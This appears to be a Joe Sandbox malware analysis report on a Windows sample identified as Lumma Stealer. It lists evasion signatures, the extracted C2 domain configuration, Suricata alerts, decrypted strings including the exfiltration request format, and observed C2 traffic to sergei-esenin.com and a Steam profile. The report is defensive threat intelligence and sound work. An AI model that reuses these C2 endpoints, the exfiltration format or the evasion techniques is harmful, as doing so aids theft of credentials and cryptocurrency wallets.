Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1526972
MD5:30da1d41d3aef9c33749c840ae2343b8
SHA1:76257e255e89334abfeeb8afe10d5adecbbd91c4
SHA256:c24402c282bbbf1c45d3778beb440d39d4980179e8a923911949875f12d51dba
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 30DA1D41D3AEF9C33749C840AE2343B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["dissapoiznw.stor", "clearancek.site", "eaglepawnoy.stor", "mobbipenju.stor", "spirittunek.stor", "licendfilteo.site", "studennotediw.stor", "bathdoomgaz.stor"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:08.659562+020020546531A Network Trojan was detected192.168.2.749701172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:08.659562+020020498361A Network Trojan was detected192.168.2.749701172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.251897+020020564771Domain Observed Used for C2 Detected192.168.2.7504901.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.161629+020020564711Domain Observed Used for C2 Detected192.168.2.7633841.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.201064+020020564811Domain Observed Used for C2 Detected192.168.2.7604011.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.187436+020020564831Domain Observed Used for C2 Detected192.168.2.7504611.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.278538+020020564731Domain Observed Used for C2 Detected192.168.2.7510731.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.175919+020020564851Domain Observed Used for C2 Detected192.168.2.7609691.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.262603+020020564751Domain Observed Used for C2 Detected192.168.2.7602951.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-06T18:42:06.231857+020020564791Domain Observed Used for C2 Detected192.168.2.7506051.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.5748.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.stor", "clearancek.site", "eaglepawnoy.stor", "mobbipenju.stor", "spirittunek.stor", "licendfilteo.site", "studennotediw.stor", "bathdoomgaz.stor"], "Build id": "4SD0y4--legendaryy"}
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1310246800.00000000000F1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.7:49701 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_001350FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_000FD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_000FD110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_001363B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00135700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h0_2_0013695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_001399D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_000FFCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00100EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]0_2_000F1000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx0_2_0012F030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00106F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00134040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00136094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0011D1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00112260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax0_2_00112260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_001042FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_000FA300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]0_2_001223E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0010B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0011E40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0010D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]0_2_00131440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0011C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh0_2_001364B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00119510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00106536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh0_2_00137520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]0_2_000F8590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0012B650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0011E66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]0_2_00137710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0011D7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]0_2_001367EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_001128E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00133920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0010D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_000F49A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00101A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00134A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_000F5A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00101ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00139B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]0_2_0010DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h0_2_0010DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_00120B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00103BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00101BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00117C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh0_2_0012FC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h0_2_0011EC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_0011AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax0_2_0011AC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0011CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0011CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0011CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00139CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00139CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0011FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]0_2_0011DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00138D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx0_2_00104E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]0_2_0011AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00115E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00117E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00101E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_000F6EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00106EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_000FBEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0012FF70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00119F62
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00106F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00135FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_0010FFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h0_2_00137FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00137FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_000F8FD0

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:50461 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:50605 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:60401 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:60969 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:63384 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:50490 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:51073 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:60295 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: dissapoiznw.stor
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: eaglepawnoy.stor
    Source: Malware configuration extractorURLs: mobbipenju.stor
    Source: Malware configuration extractorURLs: spirittunek.stor
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: studennotediw.stor
    Source: Malware configuration extractorURLs: bathdoomgaz.stor
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 172.67.206.204 172.67.206.204
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: / https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000003.1309102302.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tvD equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaigB equals www.youtube.com (Youtube)
    Source: file.exe, 00000000.00000002.1311410801.00000000013CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaigB equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1309204959.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308929689.0000000001455000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000002.1311871531.0000000001413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000000.00000003.1308335259.0000000001455000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1296959107.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
